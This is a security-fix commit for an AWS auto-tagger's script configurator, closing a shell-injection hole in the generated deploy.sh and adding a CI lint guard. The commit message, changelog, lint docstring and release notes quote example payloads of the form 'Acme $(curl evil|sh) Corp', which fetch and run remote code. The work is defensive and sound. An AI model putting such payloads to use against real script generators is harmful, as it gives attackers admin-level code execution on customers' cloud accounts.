security: single-quoted containment for customerName in deploy.sh (U4, v20.5.2)

**Security class: supply-chain RCE.** Severity: high.

The bug: configurator.html emitted the customer-name field as
`CUSTOMER="${customerDisplay}"` inside DOUBLE quotes. The JS-side
escape only neutralized single quotes. In double-quoted bash,
$(...), backticks, \, and $VAR all still expand.

A partner-supplied customer name like `Acme $(curl evil|sh) Corp`
would execute the subshell when the customer pasted the generated
deploy.sh into CloudShell — arbitrary code at AdministratorAccess
on the customer's management account.

The fix: customer-name now emits as `CUSTOMER=${customerDisplay}`
(no surrounding quotes) where customerDisplay is the output of a
shellSingleQuote helper that wraps the value in single quotes and
escapes embedded single quotes via the canonical `'\''` close-
insert-reopen pattern. CR/LF stripped so a newline can't escape
shell comment lines either. Applies to both the single-account and
multi-account deploy.sh generators.

No runtime Lambda change; YAML is byte-identical to v20.5.1 except
for the four version stamps. Customers who already deployed are
NOT affected. Customers generating a fresh deploy.sh should
re-download from the configurator before next deploy.

Guardrail: new Layer 1 CI check `Shell Injection Guard`
(.github/scripts/lint_shell_injection.py) fails the build if the
double-quoted customer-value shape is reintroduced. Regression-
verified by temporarily reintroducing the bug — both emit sites
flagged; bug reverted; lint passes again.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

Author: Chris Hyu

.github/scripts/lint_shell_injection.py

@@ -0,0 +1,123 @@
+#!/usr/bin/env python3
+"""
+lint_shell_injection.py — block a specific class of generator-side shell
+injection bug from reaching prod.
+
+Context: `configurator.html` builds a bash script at runtime via a JS
+template literal and offers it to the customer as `deploy.sh`. A naive
+author escapes user-controlled input with `.replace(/'/g, "'\\''")` and
+then emits the value inside DOUBLE quotes. In double-quoted bash,
+`$(...)`, backticks, `\`, and `$VAR` all still expand — the escape is
+irrelevant and a partner-supplied "customer name" like
+`Acme $(curl evil.sh|bash) Corp` becomes RCE on the customer's
+CloudShell with AdministratorAccess. That's U4 in the remediation plan.
+
+The only correct shape here is SINGLE-quoted containment where the
+`'\''` escape closes the span, inserts a literal quote, and reopens.
+This lint enforces that shape.
+
+Rule: any line in configurator.html that contains BOTH
+  (a) the single-quote `.replace(/'/g, "'\\''")` escape pattern, AND
+  (b) a helper variable that is subsequently emitted inside DOUBLE quotes
+must fail. Equivalently: variables produced by the single-quote escape
+must only be emitted inside single quotes (or bare — when the helper
+already wraps in single quotes itself).
+
+Heuristic shape of the negative pattern, line-by-line:
+    const X = <something>.replace(/'/g, "'\\''");
+    ...
+    ${X}  inside a line that starts with a shell-variable assignment
+    "${X}"   <-- FAIL: double-quoted emit of single-quote-escaped value
+
+A one-liner regex can't fully verify taint flow, but we can catch the
+two known-bad shapes directly: (1) the bare `.replace(/'/g, "'\\''")`
+pattern outside a containment helper that returns a single-quote-wrapped
+string; (2) any occurrence of `"${<varname>}"` where `<varname>` was
+declared via that escape. Keep the check narrow so it does not false-
+positive across future generator work.
+"""
+from __future__ import annotations
+
+import pathlib
+import re
+import sys
+
+ROOT = pathlib.Path(__file__).resolve().parents[2]
+HTML_FILE = ROOT / 'configurator.html'
+
+SINGLE_QUOTE_ESCAPE = re.compile(
+    r"""\.replace\(\s*/'/g\s*,\s*["']'\\\\''["']\s*\)"""
+)
+# A "safe" escape helper wraps its output in single quotes:
+#   `'${ ... .replace(/'/g, "'\\''") }'`
+# Detect by looking for the escape call inside a template literal that
+# opens with `' and closes with '`.
+SAFE_HELPER_LINE = re.compile(
+    r"""`'\$\{.*\.replace\(\s*/'/g\s*,\s*["']'\\\\''["']\s*\).*\}'`"""
+)
+# Lines of the form `VAR="${customerSomething}"` where the double-quote
+# wrapping is the bug (assumes the escape produced the value).
+DOUBLE_QUOTED_CUSTOMER_EMIT = re.compile(
+    r'^\s*[A-Z_][A-Z0-9_]*="\$\{(customer\w*)\}"\s*$'
+)
+
+
+def main() -> int:
+    if not HTML_FILE.exists():
+        print(f"lint_shell_injection: {HTML_FILE} not found", file=sys.stderr)
+        return 1
+
+    text = HTML_FILE.read_text()
+    fails: list[str] = []
+
+    # Check 1: every `.replace(/'/g, "'\\''")` use must be inside a
+    # containment helper that wraps its output in single quotes.
+    for m in SINGLE_QUOTE_ESCAPE.finditer(text):
+        # Find the enclosing line.
+        line_start = text.rfind('\n', 0, m.start()) + 1
+        line_end = text.find('\n', m.end())
+        line = text[line_start:line_end]
+        lineno = text.count('\n', 0, m.start()) + 1
+        # If the surrounding expression doesn't single-quote-wrap the
+        # result (see SAFE_HELPER_LINE), flag it.
+        if not SAFE_HELPER_LINE.search(line):
+            # Also tolerate lines that immediately wrap in single quotes
+            # via a later concatenation pattern like `"'" + escape + "'"`.
+            if not re.search(r"""["']'["']\s*\+""", line) and not re.search(r"""\+\s*["']'["']""", line):
+                fails.append(
+                    f"configurator.html:{lineno}: `.replace(/'/g, \"'\\\\''\")` used without "
+                    f"single-quoted containment. This escape is ONLY valid inside single-quoted "
+                    f"shell output. Wrap the result in `'...'` or use a helper that does. See U4."
+                )
+
+    # Check 2: no `VAR="${customerX}"` emit pattern. Customer-derived values
+    # must be emitted without surrounding double quotes — the helper itself
+    # produces a properly single-quoted literal.
+    for i, line in enumerate(text.splitlines(), start=1):
+        m = DOUBLE_QUOTED_CUSTOMER_EMIT.match(line)
+        if m:
+            fails.append(
+                f"configurator.html:{i}: {line.strip()!r} emits a customer-derived value inside "
+                f"double quotes. In double-quoted bash, $(...), `...`, \\, and $VAR all still "
+                f"expand — this is the U4 RCE shape. Drop the surrounding double quotes; the "
+                f"shellSingleQuote helper already wraps its output in single quotes."
+            )
+
+    if fails:
+        print("lint_shell_injection: FAILED")
+        for f in fails:
+            print(f"  ❌ {f}")
+        print()
+        print(
+            "See U4 in auto-map-tagger-state.md for the attack scenario. "
+            "The fix is shell-single-quote containment; never emit user-controlled "
+            "values inside double-quoted shell strings."
+        )
+        return 1
+
+    print("OK: no shell-injection shapes detected in configurator.html (U4 guard).")
+    return 0
+
+
+if __name__ == '__main__':
+    sys.exit(main())

.github/workflows/lint.yml

@@ -475,3 +475,20 @@ jobs:
 
       - name: Enforce CFN correctness (name lengths, !Sub coverage, ref targets)
         run: python3 .github/scripts/lint_cfn_correctness.py
+
+  # ── 10. Shell injection guard (catches the U4 RCE shape) ─────────────────
+  # configurator.html emits a bash script at runtime. A partner-controlled
+  # `customerName` field previously flowed into a double-quoted shell
+  # variable, where `$(...)`, backticks, `\`, and `$VAR` still expand —
+  # a single-line RCE against any customer who pastes the generated
+  # deploy.sh into their CloudShell. This check enforces that customer-
+  # derived values are emitted only inside single-quoted shell strings
+  # via the shellSingleQuote helper.
+  shell-injection-guard:
+    name: Shell Injection Guard
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+
+      - name: Enforce single-quoted containment for customer-controlled shell values
+        run: python3 .github/scripts/lint_shell_injection.py

CHANGELOG.md

@@ -6,6 +6,16 @@ All notable changes to the MAP 2.0 Auto-Tagger.
 
 ## v20 — Resilient SQS Pipeline + Open Source
 
+### v20.5.2 — Security: generator-side shell-injection fix (PR #46)
+
+**Security class: supply-chain RCE.** Severity: high. No runtime Lambda change; the YAML template is byte-identical to v20.5.1. Customers who already deployed are NOT affected. Customers generating a fresh `deploy.sh` should re-download from the configurator before next deploy.
+
+**The bug (U4):** `configurator.html` emitted the customer-name field into the generated `deploy.sh` as `CUSTOMER="${customerDisplay}"`, inside double quotes. The JS-side escape only neutralized single quotes. In double-quoted bash, `$(...)`, backticks, `\`, and `$VAR` all still expand. A partner-supplied customer name like `Acme $(curl evil|sh) Corp` would execute the subshell when the customer pasted the generated script into CloudShell — arbitrary code at AdministratorAccess on the customer's management account.
+
+**The fix:** customer-name now emits as `CUSTOMER=${customerDisplay}` (no surrounding quotes) where `customerDisplay` is the output of a `shellSingleQuote` helper that wraps the value in single quotes and escapes embedded single quotes via the canonical `'\''` close-insert-reopen pattern. CR/LF are stripped so a newline cannot escape a shell comment either. Applies to both the single-account and multi-account deploy.sh generators.
+
+**Guardrail:** new Layer 1 CI check `Shell Injection Guard` (`lint_shell_injection.py`) fails the build if the double-quoted customer-value shape is reintroduced. Verified against the regression — reintroducing `CUSTOMER="${customerDisplay}"` fails the check on both emit sites.
+
 ### v20.5.1 — Hygiene fixes (SSM TTL, events:TagResource, ConfigParameter output)
 
 Three independent correctness fixes (PR #44). No new capability — tightens existing code against latent failure classes.

VERSIONING.md

@@ -21,7 +21,7 @@
 
 The version lives in exactly two places:
 
-1. **`configurator.html`** — `const TEMPLATE_VERSION = 'v20.5.1';` (one occurrence)
+1. **`configurator.html`** — `const TEMPLATE_VERSION = 'v20.5.2';` (one occurrence)
 2. **`map2-auto-tagger-optimized.yaml`** — Description header, `MapVersion` SSM parameter default, Lambda `TEMPLATE_VERSION` constant, `TemplateVersion` CFN output (all four must equal the configurator constant)
 
 `.github/scripts/sync-check.py` enforces this invariant. Any drift between references is a sync-check failure.

configurator.html

@@ -977,15 +977,23 @@ <h3 style="margin:20px 0 8px;font-size:14px;" data-i18n="ui_editor_script_previe
 
     <script>
         // Template version — single source of truth for the SemVer constant.
-        // Must match `TEMPLATE_VERSION = 'v20.5.1'` in map2-auto-tagger-optimized.yaml (sync-check enforces this).
-        const TEMPLATE_VERSION = 'v20.5.1';
+        // Must match `TEMPLATE_VERSION = 'v20.5.2'` in map2-auto-tagger-optimized.yaml (sync-check enforces this).
+        const TEMPLATE_VERSION = 'v20.5.2';
 
         // Version history surfaced in the Update flow. Bullets are intentionally English-only —
         // translating release notes across 7 languages for every PR is unsustainable. Labels
         // (titles, buttons) go through i18n; change bullets stay in source form.
         // Tags: bugfix, coverage, breaking, security, perf, other.
         // sync-check.py enforces that the newest entry's version matches TEMPLATE_VERSION.
         const VERSION_HISTORY = [
+            {
+                version: 'v20.5.2',
+                date: '2026-04-25',
+                changes: [
+                    { tag: 'security', text: 'Generated deploy.sh now contains customer-name input inside single-quoted shell strings (previously double-quoted). Fixes a supply-chain RCE where a partner-supplied customer name like `Acme $(curl evil|sh) Corp` would execute on the customer\'s CloudShell with AdministratorAccess. Re-download deploy.sh from the configurator before next deploy.' },
+                    { tag: 'other',    text: 'New Layer 1 CI check (Shell Injection Guard) fails the build if the generator reintroduces the unsafe shape.' },
+                ],
+            },
             {
                 version: 'v20.5.1',
                 date: '2026-04-25',
@@ -6251,9 +6259,19 @@ <h3 style="margin:20px 0 8px;font-size:14px;" data-i18n="ui_editor_script_previe
             // Escape backticks and dollar signs in template content for safe embedding in heredoc
             const escapeHeredoc = (s) => s.replace(/`/g, '\`');
 
-            // Sanitize customer name for safe use in shell — keep display name as-is (supports Unicode),
-            // use MPE ID for filename (always ASCII-safe)
-            const customerDisplay = (config.customerName || 'Customer').replace(/'/g, "'\\''");
+            // Shell-safe containment for customerName. We emit the value inside SINGLE quotes
+            // so bash performs no interpolation. The classic `'\''` trick closes the single-quoted
+            // span, inserts an escaped literal quote, and reopens. Also strip CR/LF to prevent a
+            // newline from escaping single-line shell contexts (e.g. comment lines).
+            //
+            // DO NOT change this to double-quoted emit without also removing the single-quote escape:
+            // in double quotes, $(...), backticks, \, and $VAR all still expand, re-opening the
+            // supply-chain RCE the escape was meant to prevent.
+            const shellSingleQuote = (s) => `'${String(s).replace(/[\r\n]/g, ' ').replace(/'/g, "'\\''")}'`;
+            const customerDisplay = shellSingleQuote(config.customerName || 'Customer');
+            // Header comment form — strip CR/LF so a newline in the field can't escape the `#`
+            // comment line and land on a fresh executable line.
+            const customerComment = String(config.customerName || 'Customer').replace(/[\r\n]/g, ' ');
             const reportFile = `map-tagger-report-${mpe}-\$(date +%Y%m%d-%H%M%S).txt`;
 
             if (config.deployMode === 'single') {
@@ -6263,15 +6281,15 @@ <h3 style="margin:20px 0 8px;font-size:14px;" data-i18n="ui_editor_script_previe
 # SPDX-License-Identifier: MIT-0
 #
 # MAP 2.0 Auto-Tagger — Deployment Script
-# Customer: ${config.customerName || 'Customer'} | MPE: ${mpe}
+# Customer: ${customerComment} | MPE: ${mpe}
 # Run this file in AWS CloudShell: bash deploy.sh
 set -e
 
 STACK_NAME="map-auto-tagger-${mpe}"
 REGIONS="${regions.join(' ')}"
 REGION="${region}"
 MPE="${mpe}"
-CUSTOMER="${customerDisplay}"
+CUSTOMER=${customerDisplay}
 REPORT_FILE="${reportFile}"
 DEPLOY_TIME=\$(date '+%Y-%m-%d %H:%M:%S')
 PREFLIGHT_LOG=""
@@ -6761,7 +6779,7 @@ <h3 style="margin:20px 0 8px;font-size:14px;" data-i18n="ui_editor_script_previe
 # SPDX-License-Identifier: MIT-0
 #
 # MAP 2.0 Auto-Tagger — Deployment Script
-# Customer: ${config.customerName || 'Customer'} | MPE: ${mpe}
+# Customer: ${customerComment} | MPE: ${mpe}
 # Run this file in AWS CloudShell (management account): bash deploy.sh
 set -e
 
@@ -6770,7 +6788,7 @@ <h3 style="margin:20px 0 8px;font-size:14px;" data-i18n="ui_editor_script_previe
 ACCOUNT=\$(aws sts get-caller-identity --query Account --output text)
 BUCKET="auto-map-tagger-\${ACCOUNT}"
 STACK_NAME="map-auto-tagger-${mpe}"
-CUSTOMER="${customerDisplay}"
+CUSTOMER=${customerDisplay}
 REPORT_FILE="${reportFile}"
 DEPLOY_TIME=\$(date '+%Y-%m-%d %H:%M:%S')
 PREFLIGHT_LOG=""

map2-auto-tagger-optimized.yaml

@@ -3,7 +3,7 @@
 
 AWSTemplateFormatVersion: '2010-09-09'
 Description: >
-  MAP 2.0 Auto-Tagger v20.5.1 - Auto-tags AWS resources with map-migrated for MAP 2.0
+  MAP 2.0 Auto-Tagger v20.5.2 - Auto-tags AWS resources with map-migrated for MAP 2.0
   credit eligibility. 190+ resource types. Deploy once; tagging happens within 60-90 s
   of resource creation. Daily reconciliation Lambda (RGTA-based) catches any tags the
   live Lambda missed. Three-path error classifier + TagFailureByClass CloudWatch metric
@@ -64,7 +64,7 @@ Resources:
       Name: !Sub '/auto-map-tagger/${MpeId}/version'
       Type: String
       Description: MAP 2.0 Auto-Tagger template version pinned at deploy time
-      Value: v20.5.1
+      Value: v20.5.2
 
   # SSM Parameter Store - single source of truth for config
   MapConfig:
@@ -371,7 +371,7 @@ Resources:
           # Template version pinned at deploy time. Surfaced in CloudWatch Logs on
           # every cold start so ops can trace which version processed an event
           # without reading the CFN stack or SSM parameter.
-          TEMPLATE_VERSION = 'v20.5.1'
+          TEMPLATE_VERSION = 'v20.5.2'
           print(f'auto-map-tagger {TEMPLATE_VERSION} cold start')
 
           ssm = boto3.client('ssm')
@@ -2404,7 +2404,7 @@ Outputs:
     Value: !Ref MapConfig
   TemplateVersion:
     Description: MAP 2.0 Auto-Tagger template version (pinned at deploy time)
-    Value: v20.5.1
+    Value: v20.5.2
   AlertTopicArn:
     Description: SNS topic for tagger alerts - subscribe your email here
     Value: !Ref AlertTopic